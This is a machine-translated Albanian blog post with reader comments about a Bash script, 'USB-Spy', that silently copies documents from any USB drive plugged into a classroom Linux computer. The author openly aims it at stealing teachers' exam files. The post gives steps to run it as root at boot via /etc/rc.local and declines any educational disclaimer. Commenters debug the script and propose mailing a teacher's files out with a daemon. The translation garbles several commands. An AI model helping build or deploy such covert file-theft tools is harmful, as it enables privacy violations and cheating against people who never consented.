Skript për të spiunuar përmbajtjen e pajisjeve USB dhe për ta kopjuar atë në PC

Unë gjithmonë isha një student i shqetësuar, gjithmonë dëshiroja të përfitoja nga mundësi të tilla si ... për shembull, kopjimi i provimeve të semestrit nga shkopi USB i mësuesit ose diçka e tillë. Kur isha në shkollën e mesme (drejtimi i kompjuterit) doja të programoja "diçka" që do të bënte më poshtë:

 1. Zbuloni kur një pajisje USB është e lidhur me kompjuterin e klasës
 2. Kopjoni të gjithë përmbajtjen nga ajo pajisje në kompjuter

Kjo do të më lejonte të bëja provimin shumë kohë më parë, do të ishte e nevojshme vetëm që mësuesi të lidhë memorien e tij USB (pendrive) me kompjuterin dhe kaq.

Fatkeqësisht në institutin tim kompjuterat kishin Windows dhe… Unë kurrë dhe kurrë nuk kam mësuar të programoj për këtë OS.

Sidoqoftë tani përdor Linux (padyshim jo? LOL!), Dhe me njohuritë që gjatë gjithë këtyre viteve kam qenë në gjendje të fitoj, tani PO! Unë tashmë mund ta arrij këtë me Linux

Kjo është, unë kam programuar një skenar të thjeshtë që bën sa vijon:

1. Krijoni dosjen / home / .USBDRIVES/
2. Po kontrollon çdo 5 sekonda nëse ka ndonjë pajisje USB (ose CD / DVD) e lidhur me kompjuterin.
3. Në rast se një është i lidhur, ai do të krijojë një dosje brenda /home/.USBDRIVES/ me emrin e USB (për shembull: memorje-2gb) dhe gjithashtu, do të kopjojë të gjitha skedarët .doc, .pdf, etj (këtu lista) në këtë dosje që sapo krijuat.
4. Në rast se nuk ka ndonjë USB të lidhur, ai thjesht do të presë 5 sekonda për të filluar përsëri kontrollin që shpjegova më lart again

Këtu është skenari dhe skedari që përmban formatet që do të kopjohen:

Shkarkoni USB-Spy.zip
Skenari duhet të ekzekutohet si root në mënyrë që funksionimi i tij të mos jetë i kufizuar. Këtu shpjegoj se si ta arrijmë këtë

Kështu që skenari mund të funksionojë pa ndonjë problem, është më mirë që të fillohet me privilegje administrative (root), pasi është e qartë se duhet të fillohet së bashku me kompjuterin, në këtë mënyrë sigurohemi që nëse kompjuteri rindizet ose fikur, kur të filloj përsëri skenarin, ai do të jetë atje duke punuar, i gatshëm për të nxjerrë gjithçka që duam nga çdo USB

Le të hapim një terminal ... sapo të hapet ...

1. Supozoni se i kemi të dy skedarët / zgjedhin / (/opt/usb-spy.sh y /opt/usb-spy.files), ne duhet t'i japim privilegjet e ekzekutimit:

sudo chmod +x /opt/usb-spy.sh

2. Ne hapim skedarin /etc/rc.local :

sudo nano /etc/rc.local

3. Në të shkruajmë sipër vijës përfundimtare (dalja 0) tjetri:

/opt/usb-spy.sh &

4. Tani shtypim [Ctrl] + [X] për të ruajtur dhe dalë nga skedari, shtypim [S] ose [Y] (në varësi të gjuhës së sistemit) dhe më pas [Enter]. Kjo do të jetë e mjaftueshme që ndryshimet që kemi bërë të ruhen.

Dhe voila, kjo do të jetë e mjaftueshme që skenari të fillojë si rrënjë kur të ndezim kompjuterin.

Shtë e rëndësishme të verifikoni që skedari usb-spiun.fajla është në të njëjtin direktori si usb- spiun.sh 😉

Tani ... Unë do të shpjegoj pak punën e brendshme të skenarit, pasi e di se këtu ka shumë dashamirë të Bashit

Q: Si e di skenari se është e lidhur një pajisje USB?
A: Në skedarin / etc / mtab të sistemit tonë janë pajisjet ose ndarjet që janë montuar në sistemin tonë. Përmes rreshtit 23 të skenarit dihet nëse ka një USB të lidhur apo jo (duke bere mace ne mtab dhe grep media)
Pyetje: Po, por Si e di skenari nëse macja dhe grep na kthejnë ndonjë të dhënë apo jo?
A: Përmes një nëse, atëherë, tjetër lak e cila fillon në rreshtin 24.
Q: Si ta bëni atë të kopjojë vetëm skedarë me shtesa të dëshiruara? (.doc, .pdf, etj)
A: Përdorimi i rsync me parametra të ndryshëm, kjo është në rreshtin 34. Thjesht e shpjeguar, me rsync kopjoj vetëm skedarët që përputhen me filtrin usb-spy.files, secila rresht është një filtër për të thënë. Unë gjithashtu kaloj parametrin --prune-empty-dirs të rsync kështu që nuk krijon direktori boshe për mua.
Nga rruga diçka i rëndësishëm. Nëse një pajisje USB 8 GB (për shembull) është e lidhur, gjithçka funksionon si duhet, por kam vërejtur se nëse është e lidhur një pajisje me shumë më shumë kapacitet, të tilla si 500 GB ose 1TB, procesi i kërkimit të skedarëve .doc dhe etj për t'i kopjuar ato në kompjuter ka marrë kohë një kohë të gjatë, kështu që unë vendos një kufi GB. Kjo është, në rreshtin 31 unë deklaroj që nëse pajisja USB është më pak se 16 GB, atëherë kërkoni skedarët dhe kopjoni ato, por nëse është më e madhe se 16 GB atëherë mos bëni asgjë. Nëse doni ta rrisni atë 16 GB me 32 GB, thjesht rriteni atë numër nga linja 31

Nuk ka shumë për të shpjeguar në të vërtetë, skenari është me të vërtetë i thjeshtë për tu kuptuar :)

Nëse dikush ka ndonjë dyshim ose pyetje, ankesë, ide apo sugjerim, ju lutem thoni kështu dhe unë premtoj t'i ndihmoj ata sa më shumë që të mundem.

Epo, po mendoja të vendosja diçka si: «ky skenar është vetëm për qëllime arsimore, mos e përdorni me skedarë të dëmshëm»… Por ... çfarë dreqin! Përdoreni atë për çfarë të doni, është koha që studentët të kenë një lloj përparësie ndaj mësuesve që na shtypin 😀

të fala

Ju ende mund të bëni përmirësime të shumëfishta në skenar, por mirë që ky është një fillim i mirë mendoj, nëse dikush ndihet i motivuar për të kontribuar në këtë kauzë "fisnike" do të jetë një kënaqësi

Përmbajtja e artikullit i përmbahet parimeve tona të etika editoriale. Për të raportuar një gabim klikoni këtu.

93 komente, lini tuajën

Lini komentin tuaj

Adresa juaj e emailit nuk do të publikohet. Fusha e kërkuar janë shënuar me *

*

*

 1. Përgjegjës për të dhënat: Miguel Ángel Gatón
 2. Qëllimi i të dhënave: Kontrolloni SPAM, menaxhimin e komenteve.
 3. Legjitimimi: Pëlqimi juaj
 4. Komunikimi i të dhënave: Të dhënat nuk do t'u komunikohen palëve të treta përveç me detyrim ligjor.
 5. Ruajtja e të dhënave: Baza e të dhënave e organizuar nga Occentus Networks (BE)
 6. Të drejtat: Në çdo kohë mund të kufizoni, rikuperoni dhe fshini informacionin tuaj.

 1.   elav dijo

  Mashtrues

  XDDDD

  1.    KZKG ^ Gaara dijo

   Jo aspak ... nëse me siguri keni menduar në një moment për të bërë diçka të tillë ... HAHAHA.

   1.    Ivan Molina dijo

    Më shpëtove nga një kuiz pop pop 😀 Tani «KZKG ^ Gaara» yt je perëndia my Të lavdëroj!

  2.    facundo dijo

   Përshëndetje, skenar shumë i mirë, por në mega skedari nuk ekziston më, ju mund ta dërgoni në emailin tim, ju lutem

 2.   Oscar dijo

  Linux është 1% dhe ju thoni që nuk keni mësuar kurrë të programoni për windows kështu që tutorimi është për një sistem linux, pyetja ime është: cila është mundësia për të gjetur një mësues që përdor linux për të qenë në gjendje të kryejë tutoring?

  1.    KZKG ^ Gaara dijo

   Ky skenar ose hile është "zbatuar" në një kompjuter që nuk duhet domosdoshmërisht të jetë personal apo profesor, mjafton që të jetë ndonjë kompjuter i një Universiteti ose Kolegji, atëherë do të ishte e mundur të arrihej vetëm nga X ose Arsyeja që profesori lidh USB-në tuaj në atë kompjuter.

   Po, është për Linux, por shumë universitete kanë Linux si një sistem në laboratorët e kompjuterit, si dhe boot me një LiveCD dhe jo domosdoshmërisht instalimin e Linux në PC

   Rreth 1%, ju rekomandoj të lexoni këtë postim: https://blog.desdelinux.net/debunking-the-1-percent-myth-traducido-al-espanol/

  2.    Hyuuga_Neji dijo

   Mundësia e rënies së një meteorit gjigand në Atlantik për afërsisht 30 min

 3.   Ngas dijo

  Duket interesante, do të duhet të provohet.
  Falënderim

  1.    KZKG ^ Gaara dijo

   Shërbimi që ka nuk është diçka e shkëlqyeshme, por skenari si i tillë është interesant ... sepse mund të mësoni disa këshilla prej tij, për shembull se si të dini USB-në e lidhur, madhësinë e ndarjes, etj 🙂

 4.   cr0t0 dijo

  Një artikull origjinal dhe shumë i shpjeguar shumë mirë KZKG ^ Gaara. Gëzuar!

  1.    KZKG ^ Gaara dijo

   Faleminderit

 5.   Oscar dijo

  Çfarë guximi !!!, dhe ju guxoni ta shkruani në blogun OO, nuk di se çfarë të mendoj, a është dikush që e hakoi Gaara që nuk e pëlqen mirë?

  1.    KZKG ^ Gaara dijo

   paturpësi? pse
   Megjithëse qëllimi ose motivi i skenarit nuk mund të jetë aq serioz sa pjesa tjetër e kontributeve të mia, skenari, linjat e tij dhe logjika e programimit kanë shumë për të kontribuar, mendoj.

   Ju mund të përfitoni nga disa gjëra nga ky skenar:
   1. Si të dimë madhësinë e një ndarjeje dhe se kjo është një variabël.
   2. Si të kontrolloni nëse ka një USB të lidhur dhe të nxjerrni shtegun dhe emrin e tij.
   3. sythe nëse-atëherë-tjetër dhe ndërsa.

   Gjithsesi, nuk mendoj se kjo është krejt e padobishme ose diçka tjetër.

   1.    Oscar dijo

    Unë mendoj se ju e keqinterpretoni komentin tim, dua të them në fillim të artikullit tuaj,
    "Unë gjithmonë isha një student i shqetësuar, gjithmonë dëshiroja të përfitoja nga mundësi të tilla si ... për shembull, kopjimi i provimeve të semestrit nga shkopi USB i mësuesit ose diçka e tillë". Nëse ato që ju them ju shqetësojnë, shpresoj të më falni, nuk ishte qëllimi im.

    1.    Bler Paskal dijo

     oO blog i shkëlqyeshëm, artikuj të mirë, lexues të mirë, përdorues kërkojnë falje ... është parajsë lol pa trolls.

     1.    KZKG ^ Gaara dijo

      Falënderim ^ - ^
      Ne jemi krenarë për atë që kemi arritur deri më tani, ky komunitet është me të vërtetë krenar ... është shumë mirë të jesh pjesë e gjithë kësaj

    2.    KZKG ^ Gaara dijo

     Jo jo aspak, në të vërtetë nuk u shqetësova fare xD
     Dhe po hehe ishte gabimi im që keqinterpretova komentin tënd hehehe, më vjen keq për atë

     Asgjë që faljet nuk vijnë nga unë tani, unë do të duhet të laj fytyrën për të parë nëse përfundoj duke u zgjuar ... nga ajo që shoh, unë ende nuk jam 100% HAHAHA.

     Përshëndetje shoku

    3.    Oscar dijo

     Person shumë i mirë xD

 6.   neomit dijo

  Unë do të doja që kompjuterët e mi të kolegjit të kishin Linux muhahahjaja.

 7.   GJ1234 dijo

  Artikull i mirë!
  Por kushdo që dëshiron ta imitojë atë në Windows do të jetë më i lehtë, sepse atje ku nuk keni qasje rrënjësore në makinë që dëshironi ta përdorni, nuk mund ta lini "përgjithmonë". Me Windows kjo nuk ndodh

 8.   Bler Paskal dijo

  Shumë mirë hehe.

 9.   Hyuuga_Neji dijo

  Ideja është e mirë, ka vetëm dobësinë e përdorimit të privilegjeve Root

  1.    KZKG ^ Gaara dijo

   Epo, në të vërtetë nuk ke nevojë të rrënjosesh si i tillë ... nëse i deklaron skriptit që dosja NUK do të jetë /home/.USBDRIVES siç e kam thënë dhe thotë për shembull: / home / usuario /. USBDRIVES ... atëherë ekzekutimi i skenarit me "përdorues" do të mjaftojë

 10.   Emilio dijo

  Ashtë një ide e mirë, por unë mendoj se ju do të kurseni veten duke modifikuar rc.local dhe duke e ekzekutuar atë çdo minutë përmes crontab, dhe kështu ju shmangni problemin e ekzekutimit të tij si root dhe pjesa tjetër, nga ana tjetër, megjithëse nuk ndikon shumë, ju e konsumoni kujtesën e kompjuterit pa dobi çdo 5 sekonda për të kontrolluar nëse usb është, edhe kur nuk është. Epo kjo është këndvështrimi im

  1.    KZKG ^ Gaara dijo

   Dua të them, bëj një kontroll çdo 1 minutë, apo jo? Nuk e bëra ashtu sepse… po sikur një USB të jetë lidhur dhe shkyçur në më pak se 1 minutë? 😀

   Preferova ta bëja çdo 5 sekonda për t'u siguruar që me të vërtetë "kap" të gjitha USB-të

   Nëse ju kam keqkuptuar, ju lutem më korrigjoni

   Përshëndetje dhe mirëseardhje.

   1.    Emilio dijo

    Po, bëni kontrollin çdo minutë përmes cron, por mirë secili ka një mënyrë të ndryshme për të parë problemin, asgjë më shumë sesa shikimi i kodit, nuk do të ishte më mirë të kontrolloni nëse dosja /home/.USBDRIVES ekziston tashmë para se ta krijoni atë , është një sugjerim asgjë më shumë

    të fala

    1.    KZKG ^ Gaara dijo

     Po gjithashtu, është një detaj që vura re por ... isha dembel ta zgjidhja LOL!

     Unë gjithashtu mund të vendos një regjistër ku tregohen skedarët që janë kopjuar (regjistër individual për secilën pajisje), mbase edhe mund ta dërgoj këtë regjistër me email (duke përdorur ndonjë metodë të dërgimit të postës elektronike me terminal të atyre që kam vendosur këtu në sit) ... por sic te thashe une jam pak dembel ^ - ^ U

 11.   Pavloco dijo

  Hahahaha e madhe.

 12.   heksborg dijo

  AHA! Kështu që programi juaj mund të përdoret për keq. LOL !!! 🙂

  Truku është i mirë, por ... po sikur të doni të hiqni USB-në para se skenari të përfundojë kopjimin e përmbajtjes së tij? Në atë rast do të ankohet se është në përdorim dhe do të vërehet se ka diçka që nuk shkon. 🙂

  1.    KZKG ^ Gaara dijo

   Në të vërtetë, sistemi nuk do të lejojë që USB të hiqet, sepse "diçka" do ta përdorë atë

   1.    heksborg dijo

    Saktë! Dhe kjo është kur profesori i Oskarit mendon se ka gjetur një virus linux. LOL !! 🙂

 13.   Oscar dijo

  Ju më bëtë të kujtoj një herë se bëra diçka të ngjashme (në Uni tim nëse do të kishim linux / windows), por unë bëra një program C që gjeneronte mijëra dosje. I veshur me USB një djalë që e lidhi. Menaxheri i qendrës kompjuterike ishte i habitur! Ai mendoi se gjeti një virus në linuxx muajajajaja ... ahhh .. sa kohë ishin ato =)

  1.    Miguel dijo

   dhe cili është ndryshimi me një virus?

   1.    Oscar dijo

    Se kam arritur në distancë te USB-ja e tij dhe kam ekzekutuar programin

    1.    Miguel dijo

     hahaha, pra ishte një hack XD

  2.    KZKG ^ Gaara dijo

   😀
   hehehehehe keshtu qe gjete nje virus ne Linux apo jo? … LOL !!

 14.   Gjysmëhënat dijo

  Thjesht nuk funksionon për mua xD, nëse përpiqem ta drejtoj nga terminali më tregon këtë: ./usb-spy.sh: rreshti 31: [: -lt: pritet operatori unary
  Duket se ka diçka që nuk shkon me këtë linjë: nëse [$ USBSIZE -lt 15664800]; atëherë
  Por nuk e di se çfarë është, sepse nuk krijon gjithashtu direktorinë .USB.

  Nëse mund të zgjidhet, unë mund të gjej një skenar të dobishëm.

  1.    heksborg dijo

   Provoni të zëvendësoni df me / bin / df dhe sigurohuni që ta lëshoni atë si root.

   1.    Gjysmëhënat dijo

    Ok, tani nëse krijon dosjen .USB brenda direktorisë kryesore, por vazhdon të më tregojë përmes terminalit se: "./usb-spy.sh: rreshti 31: [: -lt: pritet që të mos jetë operatori unary" dhe nuk Mos kopjoni asgjë, në atë linjë duhet të ketë ndonjë konflikt, unë e vlerësoj ndihmën nëse dikush e sheh atë.
    Shumë falemnderit.

    1.    heksborg dijo

     A mund të na jepni përmbajtjen e skedarit tuaj / etc / mtab kur montohet USB?

     1.    Gjysmëhënat dijo

      Sigurisht, këtu shkon:

      / dev / sda12 / ext4 rw, gabime = remount-ro 0 0
      proc / proc proc rw, noexec, nosuid, nodev 0 0
      sysfs / sys sysfs rw, noexec, nosuid, nodev 0 0
      asnjë / sys / fs / siguresa / lidhje fusectl rw 0 0
      asnjë / sys / kernel / korrigjues debugfs rw 0 0
      asnjë / sistemet / kerneli / siguria e sigurisë rw 0 0
      udev / dev devmpmps rw, modaliteti = 0755 0 0
      devpts / dev / pts devpts rw, noexec, nosuid, gid = 5, modaliteti = 0620 0 0
      tmpfs / ekzekutuar tmpfs rw, noexec, nosuid, madhësia = 10%, modaliteti = 0755 0 0
      asnjë / ekzekut / kyç tmpfs rw, noexec, nosuid, nodev, madhësia = 5242880 0 0
      asnjë / drejtuar / shm tmpfs rw, nosuid, nodev 0 0
      binfmt_misc / proc / sys / fs / binfmt_misc binfmt_misc rw, noexec, nosuid, nodev 0 0
      / dev / sdb1 / media / DOCU403 vfat rw, nosuid, nodev, uid = 1000, gid = 1000, shkurtesa = m $

      Linjat e fundit janë ato të USB / dev / sdb1 të montuara

     2.    heksborg dijo

      Të shohim nëse e kemi kuptuar. 🙂

      Na jep rezultatin e komandës df. Dhe provoni të shtoni rreshtin:

      jehonë $ USBSIZE

      Pikërisht përpara nëse kjo jep problemin dhe na tregoni se çfarë del kur lëshoni skenarin. Duhet të duket kështu:

      SIZE USB = `/ bin / df | grep $ USBDEV | awk {'shtyp $ 2'} "
      jehonë $ USBSIZE
      nëse [$ USBSIZE -lt 15664800]; atëherë

      Dhe për çdo rast, gjithashtu na tregoni se cili është rezultati i komandës që df.

      1.    Gjysmëhënat dijo

       Ok, në pjesë, komanda df ma kthen këtë:

       Sistemi i skedarëve 1K-blloqe të përdorura Në dispozicion Përdorimi% Montuar në
       / dev / sda12 54082300 45246956 6125892 89% /
       udev 2004028 4 2004024 1% / dev
       tmpfs 805768 1180 804588 1% / drejtuar
       asnjë 5120 0 5120 0% / drejtuar / kyçur
       asnjë 2014420 92 2014328 1 XNUMX XNUMX% / drejtuar / shm
       / dev / sdb1 1023200 322256 700944 32% / media / DOCU 3

       Komanda e cila më kthen df: / bin / df

       Pastaj, unë kam vendosur echo $ USBSIZE, dhe rezultati është i njëjtë, nuk shtyp ndonjë gjë të re, por gabimi nga më parë, gjëja qesharake është se kjo ndodh me USB-në që po testoj, nëse vendos 500GB hard disk i jashtëm Po, ai kthen madhësinë e diskut në ekran, por 500 tejkalon 16 nga if, prandaj me hard disk nuk bën asgjë.

       Por me USB nuk bën asgjë, përveçse tregon gabimin: ./usb-spy.sh: rreshti 34: [: -lt: pritet operatori unary
       Duket sikur nuk mund të tregojë madhësinë e USB-së, por me komandën df marr madhësinë e saj.

       Faleminderit për ndihmën, le të shohim nëse mund ta marrim atë!


      2.    Gjysmëhënat dijo

       Në rast se komanda nuk dukej mirë këtu, unë lë një screenshot: http://i48.tinypic.com/j5dvn5.jpg


     3.    heksborg dijo

      Unë shoh që në mtab rruga ku duket e montuar është "/ media / DOCU403" ndërsa në df shfaqet "/ media / DOCU 3". Kjo bën që grep të mos e gjejë dhe të mos kthejë madhësinë. Provoni të ndryshoni linjat e para të for në mënyrë që ato të duken kështu:

      për USBD në `cat / etc / mtab | grep media | awk '{shtyp $ 1}' '';
      do
      USBDEV = `mace / etj / mtab | grep $ USBD | awk '{shtyp $ 2}' '"
      SIZE USB = `/ bin / df | grep $ USBD | awk {'shtyp $ 2'} "

      Ndryshimet konsistojnë në ndryshimin e emrit të ndryshores for në USBD, ndryshimin e $ 2 në fund të rreshtit for në $ 1, futjen e linjës që fillon me USBDEV menjëherë pas kryerjes dhe ndryshimin e USBDEV në USBD në vijën që fillon me USBSIZE… Shpresoj të mos jem ngatërruar. 🙂

      Ideja është që të bëjmë for me emrin e pajisjes në vend të me pikën e montimit.

      1.    KZKG ^ Gaara dijo

       Problemi ishte se në mtab kur një pajisje ka hapësira ... vendos disa karaktere "të çuditshëm" në vijë, posaçërisht në vendin hapësinor.

       Asgjë, aq e thjeshtë për tu zgjidhur sa ndryshimi i mënyrës së përcaktimit të $ USBDEV, në rreshtin 28, ndryshojeni dhe vendoseni kështu:
       for USBDEV in `df | grep media | awk -F / {'print $5'}` ;

       😀


     4.    Atheyus dijo

      Më lejoni të shoh nëse mund t'ju ndihmoj ...

      Operatori unar e tregon sepse nuk lokalizon madhësinë e diskut, kjo ndodh sepse nuk e kontrollon, kjo ndodh sepse quhet

      DOKU 3

      dhe e merr atë si dy vlera, nëse do të ishte DOCU nuk do të hapte problem

      Ndoshta kjo do të funksionojë për ju

      http://www.itimetux.com/2012/11/manejar-archivos-o-carpetas-con-espacios-en-unix.html

      Pershendetje

      1.    Gjysmëhënat dijo

       Në të vërtetë ky është problemi, sepse unë sapo kam provuar me USB të tjera që kanë një emër me një fjalë pa hapësira, shembull "klasat" dhe skenari funksionon pa probleme, kjo është arsyeja pse ai njohu diskun e ngurtë dhe jo kujtimet, por tani gjëja është Duke ditur se si i vendos citatet në kodin e skenarit, a duhet t'i vendos ato në "$ USBNAME"?

       Shumë faleminderit Atheyus dhe Hexborg për ndihmën, pothuajse është bërë.


     5.    KZKG ^ Gaara dijo

      në të vërtetë Gjysmëhënat është super e thjeshtë për tu rregulluar
      Linja 28 ... ndryshojeni në këtë:
      for USBDEV in `df | grep media | awk -F / {'print $5'}` ;

      Sapo bëra testimin me këtë ndryshim dhe funksionon mirë me pajisjet, emërtimi / emri i të cilave ka hapësirë ​​:)

      Tani do të bëj ndryshimin në skenarin për ta shkarkuar.

     6.    heksborg dijo

      Shume mire. Pra, është e lehtë për të rregulluar. 🙂

 15.   auroszx dijo

  Ohhh, shumë zgjuar ... Do të mbaj shënim në rast se do të më duhet ...

 16.   Gjysmëhënat dijo

  KZKG ^ Gaara, me atë rregullim funksionon në mënyrë perfekte, tani nëse kopjoj USB-në me hapësirë ​​në emër, faleminderit shumë të gjithëve për ndihmën, do të përpiqem të shoh nëse mund ta bëj të funksionojë me boot sistemin dhe në atë mënyrë Kontrolloni çdo cikël nëse ka ndonjë USB të lidhur.

  Në fund e kemi arritur atë xD.

  1.    KZKG ^ Gaara dijo

   ^ - ^ ... bukur hehe.
   Problemi ishte që unë përdora mtab për të njohur USB, thjesht mund të kisha përdorur df ... Kam përdorur mtab sepse mendova se do të ishte interesante t'ua shpjegoja këtë skedar, se ata e dinë atë, por unë nuk e parashikova që kjo gabimi do të ndodhte me pajisjet me hapësira lol.

   Çdo pyetje ose problem që e lini të thuhet, pothuajse të gjithëve këtu u pëlqen të ndihmojnë xD

   të fala

  2.    heksborg dijo

   Sigurisht. Ne jemi përdorues të Linux. Ne gjithmonë e marrim atë. XD

 17.   Yeretik dijo

  Instaloni një daemon në PC-në e mësuesit që do të gjenerojë një regjistrim të të gjithë skedarëve .doc, .docx, .odt, .pdf dhe t'ju dërgojë ato me postë. Si dhe skanimi i PC-së herë pas here në kërkim të ndryshimeve, skedarëve të rinj ose fshirjeve në regjistrin e përmendur, dhe anet çdo lajm do t'ju dërgojë skedarin e modifikuar ose të ri me postë gjithashtu.

 18.   Yeretik dijo

  Po kështu, unë mendoj se më shumë sesa një plaçkitje, ekzekutimi i këtij skenari (DHE SI RREGULL !!!!) është një vetëvrasje. Ju po i bëni jetën dhe gjërat 700% më të lehta për këdo që është i interesuar të fusë një skedar në PC tuaj me lejet e rrënjës dhe gjithçka. Mos harroni se në Linux nuk ka shtesa dhe se një .doc në Linux mund të jetë i njëjtë me një tekst, një video ose më keq, një skenar (këtë herë me qëllime shumë të këqija).

  1.    KZKG ^ Gaara dijo

   Ekzekutimi i tij si root nuk është plotësisht i nevojshëm, thjesht përcaktoni dosjen ku përmbajtja do të vendoset diku që përdoruesi që ekzekuton të ketë leje shkrimi (për shembull, shtëpia e tyre) dhe kjo është ajo 🙂

   Për skedarët e rrezikshëm ... mirë, mund të shtoni disa rreshta që do të chmod -x në të gjitha skedarët, duke humbur kështu pronën e ekzekutimit.

   1.    Gjysmëhënat dijo

    Unë i kam shtuar këto rreshta në fillim për të fshirë dosjen .USBDRIVES nëse është krijuar tashmë:

    nëse [-s $ PLACE]
    atëherë rm -r $ PLACE
    fi

    Në këtë mënyrë, nuk do të japë gabimin e "direktorisë tashmë ekzistuese", domethënë nëse duhet të keni kujdes që të mos ketë asgjë në dosjen .USBDRIVES që nuk duam të fshihet, sepse do ta fshijë atë dhe do të vendosë një tjetër në vendin e vet.

 19.   Daniel dijo

  Për të shtuar formate të reja skedarësh, thjesht shkruajini ato në usb-spy? për shembull .jpg .mp3 etj.

  1.    KZKG ^ Gaara dijo

   Për të shtuar lloje të reja skedarësh e vendosni në skedarët usb-spy.files
   Shikoni përmbajtjen e skedarit dhe do të shihni se si t'i shtoni ato, është mjaft e thjeshtë

 20.   Wuilmer bolivar dijo

  Nëse jemi në të njëjtin rrjet, dhe ekziston makina e një mësuesi, gjëja interesante do të ishte të bëjmë një hartëzim të rrjetit, mund të kemi ssh në makineri dhe në atë mënyrë të shpërndajmë kodin në makineritë laboratorike apo edhe në makinerinë e mësuesit ... Kjo më jep kaq shumë ide: $

 21.   ksiler dijo

  Përshëndetje, Unë ju përgëzoj për postimin dhe të gjitha kontributet tuaja, por kam një pyetje, për të parë nëse dikush mund ta zgjidhë këtë problem për mua:

  Unë isha duke testuar skenarin tuaj në një kompjuter me ubuntu 12.04LTS (me Unity) dhe ai funksionoi perfekt, por ndërsa pashë që ndaloi ekzekutimin e këtij skenari pasi hera e parë që u ekzekutua, sepse dosja .USBDRIVES ishte krijuar tashmë, vendosa për të përdorur drejtpërdrejt këtë skenar tjetër të autorësisë suaj që u postua në një pjesë tjetër të këtij forumi

  këtu unë kopjoj skenarin për ju për të gjetur veten

  #! / bin / bash
  #
  # - * - Kodimi: UTF-8 - * -
  # Ky program është softuer falas. Ju mund ta rishpërndani atë dhe / ose
  # modifikojeni atë sipas kushteve të Licencës së Përgjithshme Publike
  # e GNU siç është botuar nga Free Software Foundation,
  # ose versioni 2 i licencës në fjalë ose (në varësi të lejes tuaj
  # zgjedhje) të çdo versioni të mëvonshëm.
  #
  # Nëse bëni ndonjë modifikim në këtë aplikacion,
  # gjithmonë duhet të përmendë autorin origjinal të së njëjtës.
  #
  # Copyleft 2012, FromLinux.net {Havana, Kubë}.
  # Autori: KZKG ^ Gaara

  NDESA = 0

  ndërsa [$ CONTROL = 0]; bëj
  mace / etj / mtab | grep media >> / dev / null
  nëse [$? -ne 0]; atëherë
  COUNTER = 0
  tjetër
  COUNTER = 1
  : $ {USBDEV: = `mace / etj / mtab | grep media | awk '{shtyp $ 2}' '"/"}
  CP $ USBDEV / * / shtëpi /
  fi
  fle 5
  e bërë

  dalja 0

  Tema është si më poshtë në unitetin ubuntu12.04 lts që skenari i fundit funksionon mirë dhe funksionon, por kur e ul të njëjtin kompjuter për arsye "x", dhe përpiqem ta bëj atë të funksionojë në ubuntu 10.10 jo, mund ta bëj të funksionojë
  Nga njëra anë, hedh një gabim dhe nuk lexon njësitë e stilolapsit që kanë një emër të përbërë, për shembull: DATA-G, as nuk kopjon skedarët që kanë një emër të përbërë. Përveç këtij problemi unë kam problemin që skenari ekzekutohet vetëm kur kompjuteri të rindizet një herë.

  Pyetja do të ishte: si mund ta bëj atë skenar të më kopjojë stilolapsa dhe skedarë me emra të përbërë
  dhe nëse përdor crontab ose mund ta caktoj që të funksionojë në një kohë të caktuar

  Një detaj tjetër, në Ubuntu 10.10, pasi përdor Gnome Unë do të doja të shtoja disa kufizime për t'u marrë parasysh, kur i jepni privilegjet e ekzekutimit një skenari, ai duhet të vendoset në /etc/init.d jo në / etj /
  (Merrni parasysh që duhet ta ngjisni atje duke arritur nga terminali me sudo nautilus)

  Nga ana tjetër, një deklaratë tjetër do të ishte që pasi ta ngjisni atje për të parë nëse mund të ekzekutohet, duhet të bëhet në një terminal tjetër

  sudo su (të jetë rrënjë)
  Fjalëkalimi

  ls

  cd / etj / init.d

  ls -l

  dhe atje ne kërcejmë nëse po funksionon apo jo

  atëherë në të njëjtin terminal ose në një terminal tjetër në një kohë tjetër duke qenë si rrënjë dhe duke qenë në etc / init.d (d.m.th., deri në hapin cd / etc / init.d) si në terminalin e mëparshëm ne vazhdojmë si më poshtë për t'i dhënë asaj lejet ekzekutimi

  sudo chmod + x shkrim.sh

  azhurnimi -rc.d script.sh parazgjedhjet 80

  reboot

  Unë e përsëris këtë është në mënyrë që të ekzekutohet automatikisht në Ubuntu 10.10 nëse është një version tjetër si 12.04 ju duhet të bëni atë që thotë KZKG ^ Gaara

  Dhe një pyetje e fundit, si dua të kopjoj përmbajtjen (deri në 3 nën-dosje të pendrive) në shtëpi ose në një dosje të fshehur të shtëpisë ose jo, supozoni se ishte .USBDRIVES
  në kod nuk do të kisha për të thënë

  cp -r /media/*/*/*/home/.USBDRIVES/*

  Me pak fjalë, për të marrë atë që dua, si duhet të qëndrojë skenari?
  Sepse unë tashmë u përpoqa të modifikoj vijën që ata modifikuan në usb-spy sh, por në atë tjetër që regjistron drejtpërdrejt në shtëpi dhe hedh një gabim në vijën e modifikuar.? Të fala . Faleminderit

 22.   Kakashi dijo

  Nuk mund ta shkarkoj skenarin e dytë

 23.   metali dijo

  Shume mire. 😉

 24.   Kamaleon dijo

  Dhe nëse nuk i bëj hapat që vendos ti, çfarë ndodh? A nuk funksionon apo thjesht ekzekutohet, por pa rrënjë? Nëse kompjuterët kanë një sistem që themi se rikthen të gjithë konfigurimin e brendshëm të kompjuterit kur mbyllet, a do të funksionojë? Faleminderit.

  1.    KZKG ^ Gaara dijo

   Në rast se sistemi ka 'diçka' që bën default në / home / folder, atëherë duhet të modifikoni skriptin, ku ai thotë / home / ndryshojeni atë në / opt / ose ndonjë dosje tjetër që nuk preket.

 25.   rrjedh dijo

  Unë mendoj se për të përmirësuar skenarin dhe për të shmangur ndërhyrjen në pendrive, gjëja optimale do të ishte përparësia e llojit, madhësisë së skedarit. Për shembull, lini skedarë të mëdhenj prej 100 megabajt ose më shumë për të fundit. Ose së pari kopjoni skedarët doc, docx, txt, pdf, xml, ... etj etj etj dhe lini skedarët avi, mp4, mkv për të fundit ...

 26.   Lucas dijo

  Përshëndetje, ideja është e mirë. Doja të bëja dy pyetje:
  - A mund të bëhet e kundërt? të bëjë një skenar për penderiver, që lidhet me çdo makinë dhe nxjerr skedarë.
  - punon për Windows OS?

  1.    KZKG ^ Gaara dijo

   Përshëndetje,

   Nuk jam i sigurt se si mund të bëhet që kur lidh pendrive, i njëjti pendrive vetë-ekzekuton një skenar që ka brenda.

   Dhe jo, ky skenar nuk punon për Windows

   1.    LUCAS dijo

    Ok, faleminderit për përgjigjen time, unë do të hetoj se si ta bëj atë

 27.   Jose Damian Bazaga Ruiz dijo

  Çfarë skenari të mirë. Unë e kam analizuar dhe më duket e mrekullueshme, shpresoj që një ditë të bëj edhe skenare kaq praktike.

